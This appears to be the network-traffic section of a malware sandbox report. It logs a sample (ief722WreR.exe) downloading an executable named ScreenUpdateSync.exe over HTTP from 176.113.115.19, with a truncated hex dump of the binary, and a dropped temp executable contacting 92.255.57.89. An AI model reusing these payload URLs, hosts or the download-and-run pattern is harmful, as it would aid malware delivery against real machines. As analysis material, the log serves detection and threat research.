Dec 10, 2024 17:42:10.009763002 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.009802103 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.010175943 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.012377977 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.012459993 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.012516975 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.014767885 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.014879942 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.014951944 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.017448902 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.017503977 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.017556906 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.019850969 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.019926071 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.019989014 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.020061970 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.022507906 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.022588015 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.022610903 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.022659063 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.024867058 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.024936914 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.025005102 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.025052071 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.027443886 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.027554989 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.027631998 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.029946089 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.030086040 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.030206919 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.032490015 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.032602072 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.032636881 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.032685995 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.035031080 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.035130978 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.035224915 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.037620068 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.037750006 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.037811041 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.040086985 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.040148020 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.040214062 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.040266991 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.042697906 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.042782068 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.042885065 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.045084000 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.045156002 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.045227051 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.045284986 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.047739983 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.048031092 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.048095942 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.050167084 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.050340891 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.050404072 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.052750111 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.052819014 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.052928925 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.052984953 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.055329084 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.055524111 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.055581093 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.057810068 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.057857037 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.057919979 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.060287952 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.060348988 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.060384035 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.060461044 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.062792063 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.062880993 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.062902927 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.062951088 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.065315962 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.065366030 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.065557957 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.065748930 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.068079948 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.068224907 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.068286896 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.070332050 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.070386887 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.070560932 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.070611000 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.072871923 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.072946072 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.072999001 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.075439930 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.075725079 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.075783968 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.078109980 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.078284979 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.078345060 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.080519915 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.080579042 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.080605030 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.080699921 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.083002090 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.083117008 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.083170891 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.085546017 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.085685015 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.085748911 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.088332891 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.088392019 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.088412046 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.088464022 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.091097116 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.091170073 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.091195107 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.091212034 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.093920946 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.094010115 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.094059944 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.096257925 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.096379995 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.096415997 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.096518040 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.100716114 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.101195097 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.101253986 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.101317883 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.101386070 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.101418972 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.104362965 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.104518890 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.104574919 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.183060884 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.183129072 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.183233023 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.183289051 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.183810949 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.183864117 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.183895111 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.183942080 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.185692072 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.185705900 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.185744047 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.185786009 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.187798023 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.187843084 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.188007116 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.188122034 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.190099001 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.190145016 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.190188885 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.190244913 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.192240000 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.192297935 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.192351103 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.192397118 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.194432974 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.194483995 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.194513083 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.194559097 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.196547031 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.196598053 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.196647882 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.196748972 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.198992968 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.199039936 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.199057102 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.199099064 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.200809956 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.200875044 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.200908899 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.200949907 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.202804089 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.202867985 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.202907085 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.202958107 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.204989910 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.205003023 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.205071926 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.205085993 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.207077980 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.207144022 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.207180977 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.207226038 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.208877087 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.208944082 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.209067106 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.209150076 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.211273909 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.211286068 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.211328983 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.213149071 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.213198900 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.213212013 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.213248014 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.214864969 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.214935064 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.214967966 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.215014935 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:10.216690063 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:10.216758966 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:12.538456917 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:42:12.658174992 CET	80	49702	92.255.57.89	192.168.2.7
Dec 10, 2024 17:42:12.661572933 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:42:12.714642048 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:42:12.834264994 CET	80	49702	92.255.57.89	192.168.2.7
Dec 10, 2024 17:42:14.042779922 CET	80	49702	92.255.57.89	192.168.2.7
Dec 10, 2024 17:42:14.042840958 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:42:14.045897961 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:42:14.165561914 CET	80	49702	92.255.57.89	192.168.2.7
Dec 10, 2024 17:42:14.464345932 CET	80	49700	176.113.115.19	192.168.2.7
Dec 10, 2024 17:42:14.464432955 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:42:14.485032082 CET	80	49702	92.255.57.89	192.168.2.7
Dec 10, 2024 17:42:14.485106945 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:42:19.485518932 CET	80	49702	92.255.57.89	192.168.2.7
Dec 10, 2024 17:42:19.485583067 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:43:14.335665941 CET	49702	80	192.168.2.7	92.255.57.89
Dec 10, 2024 17:43:55.197094917 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:43:55.509567976 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:43:56.118874073 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:43:57.321996927 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:43:59.728235006 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:44:04.541654110 CET	49700	80	192.168.2.7	176.113.115.19
Dec 10, 2024 17:44:14.150585890 CET	49700	80	192.168.2.7	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 17:42:05.215326071 CET	52526	53	192.168.2.7	1.1.1.1
Dec 10, 2024 17:42:05.561398983 CET	53	52526	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 17:42:05.215326071 CET	192.168.2.7	1.1.1.1	0x9337	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 17:42:05.561398983 CET	1.1.1.1	192.168.2.7	0x9337	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 10, 2024 17:42:05.561398983 CET	1.1.1.1	192.168.2.7	0x9337	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

176.113.115.19

92.255.57.89

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	176.113.115.19	80	3076	C:\Users\user\Desktop\ief722WreR.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 17:42:07.867661953 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 10, 2024 17:42:09.220897913 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 16:42:09 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Tue, 10 Dec 2024 16:30:01 GMT ETag: "4a000-628ecfe24ce67" Accept-Ranges: bytes Content-Length: 303104 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3d 89 df 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 42 00 00 04 00 00 17 1a 05 00 02 00 00 80 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Yg{{{T{T{TE{:{zt{T{T{T{Rich{PEL=d?@B4<@`.text `.rdataL "@@.data=0l@.rsrc@@@
Dec 10, 2024 17:42:09.221033096 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 1c 00 43 00 3b 0d 04 30 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 80 15 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %C;0CujhCutu=uCjYeVYEtVPYYE}u7ujYVj5ZCCuCPmYUQeVEPuu/u9Et
Dec 10, 2024 17:42:09.221045971 CET	1236	IN	Data Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78 Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xXCtXCpXClXC5hXC=dXCfXCfXCf`XCf\XCf%XXCf-TXCXCE\|XCEXCEXCWCXC\|WCpWCt
Dec 10, 2024 17:42:09.221437931 CET	1236	IN	Data Raw: 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e Data Ascii: ^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNqN;Nu`LML s%}uMDD)}uJMYJ
Dec 10, 2024 17:42:09.221450090 CET	1236	IN	Data Raw: 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d 13 00 75 10 8d 4f e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00 Data Ascii: Y;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M
Dec 10, 2024 17:42:09.221462965 CET	1120	IN	Data Raw: 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 30 43 00 57 8b 06 c6 Data Ascii: euEEEEdMdY__^[]QUS]Vs350CWEE{tN38mNF38]E@fMUS[EMt_I[LDEEt\!E\|@GEu}t$tN38
Dec 10, 2024 17:42:09.221983910 CET	1236	IN	Data Raw: ff ff 6a 08 e8 77 f0 ff ff 59 83 65 fc 00 33 db 43 39 1d 1c 5c 43 00 0f 84 c5 00 00 00 89 1d 18 5c 43 00 8a 45 10 a2 14 5c 43 00 83 7d 0c 00 0f 85 9d 00 00 00 ff 35 a8 90 80 00 e8 10 04 00 00 59 8b f8 89 7d d8 85 ff 74 78 ff 35 a4 90 80 00 e8 fb Data Ascii: jwYe3C9\C\CE\C}5Y}tx5Yu}uu;rW9t;rJ6559}u9Et}}Eu}hCC_YhCCOYE}u
Dec 10, 2024 17:42:09.222048044 CET	1236	IN	Data Raw: ff 15 e8 00 43 00 8b f0 85 f6 75 1b ff 35 40 5f 43 00 e8 65 ff ff ff 59 8b f0 56 ff 35 6c 33 43 00 ff 15 f0 00 43 00 8b c6 5e c3 a1 68 33 43 00 83 f8 ff 74 16 50 ff 35 48 5f 43 00 e8 3b ff ff ff 59 ff d0 83 0d 68 33 43 00 ff a1 6c 33 43 00 83 f8 Data Ascii: Cu5@_CeYV5l3CC^h3CtP5H_C;Yh3Cl3CtPCl3CjhhC0CV,CuV$YEuF\C3G~t$hCPXChCu~pCKCFh4CjYevhC
Dec 10, 2024 17:42:09.222060919 CET	1236	IN	Data Raw: c8 ff 8b f0 83 f8 ff 75 ca 8b c7 5f 5e 5d c3 8b ff 55 8b ec 56 57 33 f6 6a 00 ff 75 0c ff 75 08 e8 97 f3 ff ff 8b f8 83 c4 0c 85 ff 75 27 39 05 4c 5f 43 00 76 1f 56 ff 15 d4 00 43 00 8d 86 e8 03 00 00 3b 05 4c 5f 43 00 76 03 83 c8 ff 8b f0 83 f8 Data Ascii: u_^]UVW3juuu'9L_CvVC;L_Cvu_^]UVW3uuW&YYu,9Et'9L_CvVC;L_Cvu_^]jhC3]3;;uOWWWWWBS=u8jY
Dec 10, 2024 17:42:09.222074032 CET	1236	IN	Data Raw: db 75 07 33 c0 e9 fb 00 00 00 83 fb 05 75 0c 83 60 08 00 33 c0 40 e9 ea 00 00 00 83 fb 01 0f 84 de 00 00 00 8b 4e 60 89 4d f8 8b 4d 0c 89 4e 60 8b 48 04 83 f9 08 0f 85 b8 00 00 00 8b 0d 70 33 43 00 8b 3d 74 33 43 00 8b d1 03 f9 3b d7 7d 24 6b c9 Data Ascii: u3u`3@N`MMN`Hp3C=t3C;}$k~\d9=p3Ct3CB;\|]~d=uFd^=uFdN=uFd>=uFd.=uFd=uFd=uFdvdjY~d
Dec 10, 2024 17:42:09.340455055 CET	1236	IN	Data Raw: 83 f8 78 75 0a 6a 02 58 a3 58 60 43 00 eb 05 a1 58 60 43 00 83 f8 01 0f 85 81 00 00 00 3b fb 75 0f ff d6 8b f8 3b fb 75 07 33 c0 e9 ca 00 00 00 8b c7 66 39 1f 74 0e 40 40 66 39 18 75 f9 40 40 66 39 18 75 f2 8b 35 08 01 43 00 53 53 53 2b c7 53 d1 Data Ascii: xujXX`CX`C;u;u3f9t@@f9u@@f9u5CSSS+S@PWSSEE;t/PYE;t!SSuPuWSSuuY]]WC\t;u4C;r8t@8u@8u+@PEQY;uVCEuVWJ V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49702	92.255.57.89	80	564	C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 17:42:12.714642048 CET	87	OUT	GET / HTTP/1.1 Host: 92.255.57.89 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 17:42:14.042779922 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 16:42:13 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
